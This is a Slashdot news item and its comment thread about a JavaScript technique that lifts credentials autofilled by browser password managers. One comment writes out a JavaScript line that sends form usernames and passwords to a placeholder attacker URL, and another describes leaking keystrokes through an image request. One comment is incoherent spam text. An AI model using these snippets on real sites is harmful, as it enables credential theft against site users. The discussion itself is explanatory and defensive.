×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Holes Remain Open in Firefox Password Manager

Zonk posted more than 5 years ago | from the batten-down-the-hatches dept.

Security 191

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

191 comments

Thank goodness... (1, Funny)

gardyloo (512791) | more than 5 years ago | (#19926513)

... my luggage doesn't run JavaScript.

Re:Thank goodness... (3, Funny)

Opportunist (166417) | more than 5 years ago | (#19926555)

Which brings us back to simplistic password. I mean, you'd be surprised how many people have 1 2 3 4 5 as the key to their luggage. Or their atmosphere shield.

Re:Thank goodness... (2, Interesting)

sci50514 (722502) | more than 5 years ago | (#19927297)

I travel widely. If your luggage is randomly selected by US custom for inspection, they will force open your luggage if they can't open it using the default 0000 password. Good luck when it hits you. I got my luggage damage a few years ago and a letter stating Homeland Security is not liable for any damage. Now I never set password on my luggage. There is nothing expensive inside any way.

Re:Thank goodness... (1, Offtopic)

SatanicPuppy (611928) | more than 5 years ago | (#19927643)

I just stopped carrying luggage. Now when I travel, if I'm forced to fly commercial, I carry a backpack with what I need, and ship the rest.

Homeland security is a bad joke; they only prepare for the least likely attacks...I can't carry a soda on the plane because I may have 50,000 dollars worth of chemistry equipment shoved up my ass which would allow me to manufacture that soda into a bomb? Give me an effing break.

I have to x-ray my shoes because my shoes may explode? Do I look like James Bond? And, insult to injury, they only x-ray the damn things, so if, for example, they were semtex encased in a thin layer of rubber that I was going to detonate with junk stored in my laptop or cell phone, it still wouldn't be caught.

Re:Thank goodness... (0)

Anonymous Coward | more than 5 years ago | (#19927859)

semtex encased in a thin layer of rubber

So, does semtex ignite in fire (I'm not a demolition expert, I dunno)? Because dohs still officially allows you to fly with a book of matches despite the fact there's no legal use of them on board.

At least the shoe thing was something that was tried before (Richard Reid). That the response was to make everyone take off their shoes rather than take away their sources of ignition is sad though.

Firefox no longer safe? (4, Funny)

JamesD_UK (721413) | more than 5 years ago | (#19926559)

That's it, I'm leaving the Internet. Forever.

Re:Firefox no longer safe? (4, Insightful)

dvice_null (981029) | more than 5 years ago | (#19926981)

It is not about safety of the Firefox. It is about safety of websites that allows users to insert Javascript code to their sites. It's like a bank which would allow anyone to step behind the desk and act as an employee of the bank.

But they can only "steal" the passwords of that website. They can't steal your all passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.

Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about user's security.

Re:Firefox no longer safe? (3, Insightful)

CastrTroy (595695) | more than 5 years ago | (#19927495)

Which outlines the whole strength of having a password manager. You can have a different password for each website. Without a password manager, it's hard to do this because there are so many sites that require passwords. For my password management, I use passwordsafe [sourceforge.net], because it lets me manage all my passwords, not just ones for websites, and I can put it on a usb memory stick, and carry all my passwords with me.

This brings up another thought. If the websites in question allow users to post javascript, and there happens to be a login section on that page, then couldn't the user posting the script add an onchange or onkeypress event to the username and password fields to capture the username and password, and then forward the information to their server by creating an img element, and having the username and password passed as GET variables appended to the URL of the img src, which is in fact just a php page that stores the username and password in a database. Seems to me that any site that allows people to post executable javascript is just asking for trouble.

I value security, so I'll stick with IE (-1, Troll)

Anonymous Coward | more than 5 years ago | (#19927313)

I've really never seen much reason to install a second, superfluous, browser on my system. Sure, it had tabs, BFD. And now that IE7 is using tabs, it's still not that big a deal.

But really, from a security standpoint, the fewer applications you have installed, the more secure your system is. It's called decreasing your attack surface. And really, give the bloatware reputation of Firefox, they really aren't the bastion of secure computing the FOSSie FUD tries making them out to be.

FOSSies still can't even make teh Lunix secure: heck, they can't even get it to work as well as Windows 95. What on earth makes them think they can make Firefox secure? THAT is the real reason the FOSSies are so desperate for Microsoft to release the Windows source code: the FOSSies have no idea how to impliment something as important and complicated (and reliable) as "Plug and Play".

Now personally, I don't really have anything important on my home PC, but I still wouldn't trust my security to Firefox. Why bother? Why risk it? Mozilla already lost once in the marketplace of ideas to Microsoft: Netscape may have been the worst, buggiest browser ever made. People literally ran screaming into Microsoft's arms, crying for joy after switching to IE 3.02 (and saving $50 in the process).

It's just a browser, people. Get a grip. It just opens web pages. This is like the other "software as statement of lifestyle" opinions, like the lusers of OS X and Lunix constantly spew. Nobody cares what software you use, and you aren't getting all up in our collective grills by using teh Lunix. You are just gimping yourself and your career... which actually makes other people happy. One less person to compete with during a job search!

It's evolution baby (1, Insightful)

Anonymous Coward | more than 5 years ago | (#19926561)

Only the brightest survive (e.g. we, who use NoScript).

Re:It's evolution baby (2, Interesting)

janrinok (846318) | more than 5 years ago | (#19926631)

The article and TFS tell me that using NoScript (which I do) means that many Web2 sites no longer function properly. I cannot say that I have ever noticed this - has anybody? Perhaps it only affects the sort of web page that I would not wish to visit...?

Re:It's evolution baby (1)

apathy maybe (922212) | more than 5 years ago | (#19926963)

Many airline websites don't function if you have JavaScript and cookies turned off. Of course, they don't tell you that they need these things, they just silently fail.

Some sites, such as Slashdot and Wikipedia, use JavaScript, but only for extra functionality. You don't actually need it.

Some sites that do require JavaScript actually are kind enough to tell you if have JavaScript disabled, but there aren't that many that I've noticed.

Re:It's evolution baby (1)

janrinok (846318) | more than 5 years ago | (#19927577)

Thank you, but this I know. That is not quite the same as saying Web2 pages do not work. Neither do Web1 pages if they rely on JavaScript. (http://www.oreillynet.com/pub/a/oreilly/tim/news/ 2005/09/30/what-is-web-20.html). So this is simply a statement which means that 'if you switch of JavaScript then those pages that need JavaScript will not function correctly'. That's why I have been using NoScript for a long time - it prevents a web site running code on my computer.

Re:It's evolution baby (1)

drinkypoo (153816) | more than 5 years ago | (#19927499)

They don't work properly until you activate scripts. You haven't noticed that pages which require javascript don't work after installing noscript, at least until you do something? It doesn't sound like it's working right to me :P (or you aren't)

stupid features (1, Interesting)

D+iz+a+n+k+Meister (609493) | more than 5 years ago | (#19926569)

I think people really need to have their head examined when it comes to certain features.

Don't want to remember all your passwords? Don't use sites that require passwords.

Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

Having something "remember" your passwords defeats the purpose of having passwords.

Re:stupid features (4, Insightful)

dvice_null (981029) | more than 5 years ago | (#19926941)

> Don't want to remember all your passwords? Don't use sites that require passwords.

Or more specificly: Don't use internet. How many webmails you know that don't use password? You couldn't even write to Slashdot, except anonymously.

> Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by they key holders, nor have I ever heard of a case that someone else had been.

> Having something "remember" your passwords defeats the purpose of having passwords.

Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.

Re:stupid features (1)

D+iz+a+n+k+Meister (609493) | more than 5 years ago | (#19927551)

Insightful, huh people?

Look, I like firefox. I am using it right now.

But,

>Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.

demonstrates such a lack of understanding, I don't even know where to begin.

No, a password manager doesn't make passwords behave like client sertificates. It makes passwords available to javascript.

Please, show me a client sertification protocol that makes the full credentials available to insecure parts of the application.

A landlord having duplicate keys is NOT the same thing as having someone manage YOUR OWN PERSONAL COPY of the keys.

It is a stupid feature.

M$ passport is also a stupid feature.

Yeah, managing my /. password in the same place as my banking password is soooo freaking brilliant. The two places deserve equal security.</sarcasm>

Defending stupidity... (0)

Anonymous Coward | more than 5 years ago | (#19927997)

Defending stupidity only makes you look stupid.

If someone can't remember a password, should they really be using a computer? How on earth can anyone function with such a defective brain that they are unable to remember a string of 4-8 characters?

Do they have to tattoo the names of their wife and kids onto them, like in "Memento"?

Re:stupid features (1)

xgr3gx (1068984) | more than 5 years ago | (#19927051)

I agree. Using a password manager makes you lazy and forgetful of your passwords. I used to use one until I tried to login to places on computers other than my own and couldn't remember my login info. That, and when I realized how easy they can be exploited.

Re:stupid features (1)

BrokenHalo (565198) | more than 5 years ago | (#19927621)

Don't want to remember all your passwords? Don't use sites that require passwords.

Not very helpful, perhaps.

But then, I don't allow my browser to remember any passwords that are important to me (by which I mean things like banking or important email accounts).

Less important sites - and yes, Slashdot is one of them - can have passwords stored on my machine, since it's not really the end of the world if they get cracked.

Re:stupid features (1)

Cracked Pottery (947450) | more than 5 years ago | (#19927649)

Some passwords are a nuisance, such as logging onto a free newspaper site. In the case where you are confident about the physical security of your computer, such as a home computer with trusted family members, it's a convenience so long as the system does not possibly provide your passwords to sites other than the true site for which they are used. Bank sites no longer permit authentication with stored passwords.


It doesn't seem difficult to me to just require an authenticated certificate before passwords are presented for SSL sites. This should at least be an option. You can't always protect against foolishness, such as doing business involving money with untrusted sites. I don't want cookies being revealed to any but the site that issued it. These appear to be solvable problems.

Re:stupid features (1)

Peeteriz (821290) | more than 5 years ago | (#19927713)

Well, often I don't decide if I need a password.
Most of these 'remembered' passwords are completely useless to me, just some random site requires that I 'create an account' to, say, view the postings in it's forums. And that dumb site then requires '6+ mixed case letters with at least one number', when I would be happy with a blank password - there Firefox remembering this password is a nice thing.

Heck, I wouldn't even want to remember what username I have on these sites, I want it to 'just work' - if my computer wouldn't remember the usernames for me, i'd simply create a new disposable account every time instead of trying to write them down. Remembering it is feasible only if it's a standard username/password that I use on a hundred other sites.

Password Maker plug contained within (1)

Glytch (4881) | more than 5 years ago | (#19927915)

I'd like to plug Password Maker [passwordmaker.org]. It's under the LGPL license. It creates a per-site password using the site's domain name and a passphrase of your choosing as seeds. All the advantages of a password manager, strong passwords, and different passwords for different accounts without actually having to store anything on disk or remembering more than one passphrase. Since by default there's no password stored on disk (and the extension will specifically warn against doing this if you change that setting), there's nothing for password-stealing javascript exploits to get.

Because of the hash that's used, it doesn't work on sites that require alphanumeric passwords, but any site with that idiotic requirement has serious security issues anyway.

Lies, damned lies (-1, Flamebait)

trifish (826353) | more than 5 years ago | (#19926597)

However, the real problem might not be Firefox' password manager.

I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.

Re:Lies, damned lies (1)

hal9000(jr) (316943) | more than 5 years ago | (#19926649)

So before you jump to that conclusion, have you tested this against other browsers?

Not being a developer myself,I don't know have an idea about how to fix it, but this seems like an awful sticky technical problem.

Re:Lies, damned lies (1)

janrinok (846318) | more than 5 years ago | (#19926741)

Firefox having a vulnerability in the password manager does not make IE6 and IE7 'more secure' browsers. If it did, then this site (http://www.sans.org/top20/) would not be worth reading....

Re:Lies, damned lies (2, Informative)

Anonymous Coward | more than 5 years ago | (#19926747)

IE is not affected because it doesn't automatically enter the info into the forms on load.

Re:Lies, damned lies (3, Informative)

discord5 (798235) | more than 5 years ago | (#19927087)

I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.

From the MSDN website [microsoft.com] I can quote:

When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.

So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.

document.location="http://some.hackers.url/collect .php?user=" + document.form.user.value + "&pass=" + document.form.pass.value;

Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)

Just stating the obvious, although now I'm actually curious if this works on IE...

Re:Lies, damned lies (2, Interesting)

FLEB (312391) | more than 5 years ago | (#19927139)

It's not even really a browser security issue. Okay, I suppose there could be user-interaction requirements so the form-filler doesn't *automatically* autofill on page load, but the real issue is site-owners who ignore the basic principles of site security and password handling, and open their users up to simple exploits.

The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption-- a line has to be drawn somewhere as to what "one entity" is, and to split it much further would lead to unnecessary hoops and inconveniences. Back in the NetSol-monopoly days before cheap domain names, this point may have been debatable, but at that time there was far less personal information getting passed around by clients, as well.

Nowadays, anyone who is running a service with open access and open-ended "userpages" should be taking the bare-minimum step of sub-domaining their users' pages, and sub-domaining their own login forms as well. It costs nothing, it's more convenient for users, and it sandboxes everyone from each others' potential hack-attacks. If an exploit that gets around that, then people can talk, as that'd be a legitimate XSS or trojan/spoofing exploit. This stuff, though, is pinning exploits borne of shoddy web-side security onto the client developers.

Re:Lies, damned lies (1)

drinkypoo (153816) | more than 5 years ago | (#19927443)

I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.

Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?

History disagrees with you.

If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.

But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.

Re:Lies, damned lies (1)

FiveStarGeneralChaos (1130809) | more than 5 years ago | (#19927543)

Did anyone bother to read the details of this vulnerability?

But this means, that a second, evil page on the same server could steal those saved passwords.


In this case the server has already been compromised to some degree... and the only password in jeopardy is one to the very server you are connected to....
That's like saying a local restaurant is not a safe place to use a credit card.... because the staff might see my credit card number or they might be robbed and have my signature slip stolen...

BTW: Have any IE users actually tested to see that IE doesn't have the same "vulnerability"?

Re:Lies, damned lies (1, Insightful)

Anonymous Coward | more than 5 years ago | (#19927767)

What does Window Snyder have to say now? How many times have we shown you the exploits (and demonstrated fully) and got shot down for it? Well, now that the real exploits are gaining attention (thanks to some clever tactics), we'll see her reaction later. Her constant smartass remarks, and devs hiding certain bug exploits and fixes from the ones that found them in order to save face is just making Mozilla look worse and worse. When you have to rely on third party software to keep Firefox safe now, well, it's starting to sound more like IE now, huh? Please, lets save Mozilla by ridiculing the people in it causing the problems and not allowing change to happen instead of piling bloat over bloat (It's pretty bad when you have such horrible memory leaks in Firefox now).

I am not a Microsoft shill, I support fixing Firefox but the masters don't care.

Re:Lies, damned lies (2, Insightful)

g4sy (694060) | more than 5 years ago | (#19928137)

Fanboy here. You're right. Got that outta the way

The problem is not really with the firefox password manager, because

1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?

2. Remember the problem boils down to using your fileserver password for your myspace account: that's what this is talking about. It's not like an attacker can read your whole password manager, it can only get the password for a certain site that they have ALREADY compromised (myspace and facebook are sites that are compromised by design). If you use one password for all those inherently insecure sites, and another one for your email, and another one for your banking then this attack, even if successful, will not hurt you as much as you think it would Oh no! Some script kiddy finally managed to get my facebook password! He might upload pictures... and people would think I have a life.

Possible fix (4, Interesting)

Arthur B. (806360) | more than 5 years ago | (#19926607)

Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.

Secure Login extension (3, Informative)

David_W (35680) | more than 5 years ago | (#19927195)

Do not use a pull model but a push model like the bugmenot extension.

You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login [mozilla.org] extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.

Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.

Re:Secure Login extension (1)

Arthur B. (806360) | more than 5 years ago | (#19927333)

The nice thing with a contextual menu is that it could provide you with the list of all possible login you have for this website.

Re:Possible fix (1)

discord5 (798235) | more than 5 years ago | (#19927335)

A right click in the login form would allow you to automatically enter saved information. It's much safer.

Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.

You should never allow untrusted users to put javascript on your site (and to be on the safe side even HTML).

Re:Possible fix (1)

Arthur B. (806360) | more than 5 years ago | (#19927841)

In the case you describe (user javascript on the same page as the login form) manually entered javascript is also affected... there's not much you can do about that in the browser.

Re:Possible fix (2, Interesting)

m0RpHeus (122706) | more than 5 years ago | (#19927373)

Do not use a pull model but a push model That's exactly how Opera's password manager works. You need to click on the Wand button to enter the user name and password on the form fields. And FYI, the security hole does not affect Opera.

password complexity (4, Interesting)

farker haiku (883529) | more than 5 years ago | (#19926657)

I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.

Re:password complexity (1)

farker haiku (883529) | more than 5 years ago | (#19926693)

I meant to tie that in with the topic... these password managers make life easy. The person that comes up with a secure, non hackable implimentation of it will make a fortune.

It's already been done (1)

morgan_greywolf (835522) | more than 5 years ago | (#19926971)

It's already been done, and the result is open source: KeePass [keepass.info]. Unlike other password managers, KeePass stores passwords in a cryptographically-safe database. Passwords are never entered automatically -- you can double click the KeePass password field to copy the password to the clipboard for 10 seconds, and then paste it into Web page's password field. After 10 seconds, the password is automatically removed from the clipboard. Works for more than web pages, too.

Re:It's already been done (0)

Anonymous Coward | more than 5 years ago | (#19928157)

Oh holy shit on a stick. I desperately wanted to believe that this was fake. Desperately. Not even RMS could come up with a name this awful, I told myself. But curiosity got the better of me, and I googled it, and it's for real. Keepass. Keep ass. You aren't fooling anybody with that capitalized P. Keepass. Ass. Asskeep. Is your ass getting out of control? You need Keepass! Keepass is a completely automated solution that will proactively manage your ass for you, leaving you free to get on with your busy day! Order now and get two extra Keepass refill packs, absolutely free!

Re:password complexity (1)

UbuntuDupe (970646) | more than 5 years ago | (#19926847)

I have two credit cards. (Well three, let's start with the two.) Each of them I got from a different credit union. For online access to those cards' accounts, the CU sites send me to ezcardinfo.com. Even though both cards are stored at that site, I have to set up a different username for each site. Then ezcardinfo and my CUs phased in new security measures where I have to also know a picture and a description of that picture for each site. So that means four sites for which I have a username, password, picture, description of a picture, and security questions, even though they could be (and were previously) consolidated to two.

On top of that, I have a third credit card (before you ask, yes I pay the balance on each bill, no interest accrued) that has a different namespace requirement, requiring a different username and password. Add to that my 401k site, my non-work mutual fund site, and my discount brokerage site. (The 401k provider, Fidelity, sucks for mutual funds, and the mutual fund site, Vanguard, sucks for stock purchase.) All with their own security measures.

Clarification (5, Informative)

jojoba_oil (1071932) | more than 5 years ago | (#19926683)

Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function.
That's very misleading. Allow me to clarify:

Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript! [noscript.net], an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

Re:Clarification (3, Interesting)

Opportunist (166417) | more than 5 years ago | (#19926771)

That's exactly the problem with Web2.0, that NoScript would probably not cut it.

Take MySpace. How do you want to handle it? Whitelist MySpace as a whole? Then you got no security. Whitelist certain user pages? Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.

The problem is not that certain domains are "evil". Ok, that problem exists, too, but it's a very different problem. The problem is that it's now possible to put malicious script code into user generated content, and that other content on the same server and domain is what people want to see.

Re:Clarification (1)

Gregb05 (754217) | more than 5 years ago | (#19926867)

You're not banking with MySpace (I hope)
Generally if a site has some sort of importance, there will be no native AJAX/Javascript/whatever that will interfere with people blocking scripts on the site.
Worst thing that could happen on MySpace is someone puts a terrorist comment, the FBI talks to you and you say that you didn't put it there, and the IP logs will back you up.


I don't think anyone in the world will go into the business of stealing Web2.0 passwords for profit.

Re:Clarification (2, Insightful)

flitty (981864) | more than 5 years ago | (#19926901)

Easy. Don't use Myspace.

Usually my NoScript when blocking Java has a list of about 5 or 6 current sites running scripts (ad-servers and whatnot, ads.google.com comes up on almost every page), and anything other than the trusted site i'm at NEVER gets whitelisted, it's just not worth the risk. It's a hell of a lot better running a crippled 2.0 website than losing control of what's coming into my computer. I don't need to see all your pretty java crap, and a good site doesn't rely on java to display correctly anyway.

Re:Clarification (2, Informative)

jojoba_oil (1071932) | more than 5 years ago | (#19926919)

Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.

Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript. It is extremely rare that I stumble across a website that I cannot get working. As for user-generated content, that's precisely the reason NoScript! allows you to whitelist specific pages. (Or being that I'm not a dev, perhaps it's just a handy use for that feature).

Please stop spreading FUD and use an extension before you try to knock it.

Firefox password manager (4, Interesting)

wile_e_wonka (934864) | more than 5 years ago | (#19926711)

The thing that scared me away from the password manager in Firefox was a program called System Info for Windows [gtopala.com]. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

Re:Firefox password manager (2, Insightful)

jedidiah (1196) | more than 5 years ago | (#19926745)

You aren't trying to keep it secret from yourself. You're trying to keep it secret from others. At the very least you could run the relevant password saving program in a debugger on your own machine to extract the data in question.

The fact that a program running on your machine as you can read your passwords is only marginally disturbing.

Re:Firefox password manager (1)

jojoba_oil (1071932) | more than 5 years ago | (#19926765)

For your passwords saved in Firefox, do you use a master password?

As far as I know, unless you provide that master password as an external "key" there really isn't any way that Firefox can store your passwords in such a manner to prevent other programs from retrieving them while still able to access them as plain text itself.

Re:Firefox password manager (4, Informative)

Derek Pomery (2028) | more than 5 years ago | (#19926773)

Your first mistake is not setting a master password in Firefox.
Once you do that it won't be able to read them either.
Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

Re:Firefox password manager (1)

wile_e_wonka (934864) | more than 5 years ago | (#19927937)

I don't have a master password in Opera--and the program does look for them (reread my post). Additionally, passwords in Opera are saved in "wand.dat"; if you open this file in a text editor is comes out nonsense. Other Opera .dat files (cookies, history, etc) are readable in a text editor (I notice they are more readable in Wordpad than Notepad), which makes me think Opera isn't just saving these as text. FF passwords appear to be saved in "signons2.txt"--this file opens nicely in notepad or wordpad, and is easily readable--except for the usernames and passwords themselves, which are encrypted.

I find it notable that this little program easily gleans the info from FF while not able to pull password info from Opera (though it does try). Another user said this is no big deal because it's a program running locally on my computer. It seems to me that it's still a security risk because a virus like this program could upload that password information to some criminal. Plus--how do I know this information can't be collected remotely?

Last--FF needs a master password set to be even remotely secure with regard to passwords, while Opera does not. This seems like a big hole.

Re:Firefox password manager (1)

gazbo (517111) | more than 5 years ago | (#19926809)

That really shouldn't come as a surprise. How can the browser supply the password to a site if it's not somewhere on the hard disk waiting to be read? The only sensible way is to encrypt it with a key that the user must enter on browser startup, which most people would find a fucking annoying nag rather than a necessary security feature.

Re:Firefox password manager (1)

p3d0 (42270) | more than 5 years ago | (#19928127)

Or, it could ask for a "master password" when it goes to fill in a password the first time.

WAIT! It already does that!! OMG

Re:Firefox password manager (1)

kebes (861706) | more than 5 years ago | (#19926877)

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
Well, any program running with user rights can probably read the firefox passwords, since they are not hard for a user to obtain. Just go into "Options" > "Security" > "Show Passwords..." > "Show Passwords" and click "Yes" on the confirmation dialog. You'll see all the stored passwords in plaintext. This means that your passwords can be read without trouble. For instance anyone who sits down at your computer can check through those and find out what your passwords are.

This kind of password manager is not very secure... but then again the intention here is convenience. The idea is that on computers you "trust" (you are confident that they are physically secured to only trusted people sitting down at them, and you are confident they are not riddled with spyware) then you give up a little bit of security for a good amount of convenience. Of course it goes without saying that you should not be using the same passwords on these unimportant websites (which get stored in your password manager) and important things in your life (e.g. root password on an important server!).

In KDE, the KWallet application allows you to use a single master-password to store/encrypt all these lower-priority passwords. This is slightly less convenient, but is much more secure. When you start browsing in Konqueror and encounter a password field, KWallet pops up, you enter your master-password and it fills in the password fields for you. You also set a timeout if you want (the wallet "stays open" for some amount of time, so you don't have to re-enter the master password too often). Without the master password you can't unlock (or even decrypt) all the other passwords. With only one password to remember, it's reasonably convenient. Probably there similar apps available for OS X and Windows? In any case what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password."

Re:Firefox password manager (1)

kebes (861706) | more than 5 years ago | (#19926949)

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password."
To clarify (before someone points out my mistake!): I see that Firefox has a "Set Master Password" option in the Security settings. What I should have said was:

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password" in the default configuration.

Re:Firefox password manager (1)

Eric Pierce (636318) | more than 5 years ago | (#19926951)

"It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same."

Exactly. For example, something like System Info for Windows [gtopala.com] EP

Password Managers and Simple Passwords (5, Insightful)

andrewd18 (989408) | more than 5 years ago | (#19926779)

On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.
Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password. The only thing stopping people from using simplistic passwords is the quality of the IT department's restrictions. I bet every salesperson in my office would use "gocubsgo" as their password if our IT department didn't demand at least one capital letter and a number. As such, their passwords are now "goCubsgo2007".

Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."

Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.

I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.

Re:Password Managers and Simple Passwords (2, Insightful)

Otter (3800) | more than 5 years ago | (#19927115)

Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password....Don't tell me that an in-browser password manager stops people from using the same password everywhere.

You're right. The real advantage of the password manager is that it's the only reasonable alternative to writing down all of those unique, complex, constantly changing passwords.

Re:Password Managers and Simple Passwords (1)

klenwell (960296) | more than 5 years ago | (#19928087)

I don't know how reasonable this is as an alternative (it won't work for most LAN/desktop situations), but this is what I use for logins to internet sites that aren't a high security concern for me:

http://mushpup.org/ [mushpup.org]

I rolled this myself and it runw all client-side with javascript (both the cause and solution to all life's problems?). If you were concerned about the security of a third-party site (as you should be -- though this is safe) you could roll your own pretty easily and stick it on your own public site.

It's handy because I can just add a reminder to the profile page that most sites offer. And it makes my password for the site easily available where I have an internet connection. (Though it does require visiting the mushpup site and entering the info there and then pasting it back to site I want to log into.)

My slashdot password: m{this.domain/this.user}

Re:Password Managers and Simple Passwords (1)

joeljkp (254783) | more than 5 years ago | (#19927699)

That's the fundamental flaw with passwords: people have to either remember them or store them somewhere, which leads to weak, easy-to-remember passwords or insecure storage systems.

When's biometric security coming for the web? Scan my fingerprint to log into Slashdot?

Re:Password Managers and Simple Passwords (1)

Beryllium Sphere(tm) (193358) | more than 5 years ago | (#19928033)

>Don't tell me that an in-browser password manager stops people from using the same password everywhere.

That depends on the password manager. Firefox's password manager doesn't automatically create different passwords per site, but the pwdhash extension does. It hashes the site name with a master password to create a strong and site-specific password. There are several extensions that do this but pwdhash is my favorite.

Alternatives (0)

Anonymous Coward | more than 5 years ago | (#19926793)

Use something like PasswordSafe (http://passwordsafe.sourceforge.net/) to store your passwords.

This is the best (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#19926801)

That's like saying someone always puts earth first. Knowing local legislative has always given readily independent a nalysis doings. Vacuum orders load down ever man offering republicans testimonies. Knowledge in locals locations has evermore influence on the environment. It makes sense if you look at the details.

OpenID (1)

shmert (258705) | more than 5 years ago | (#19926909)

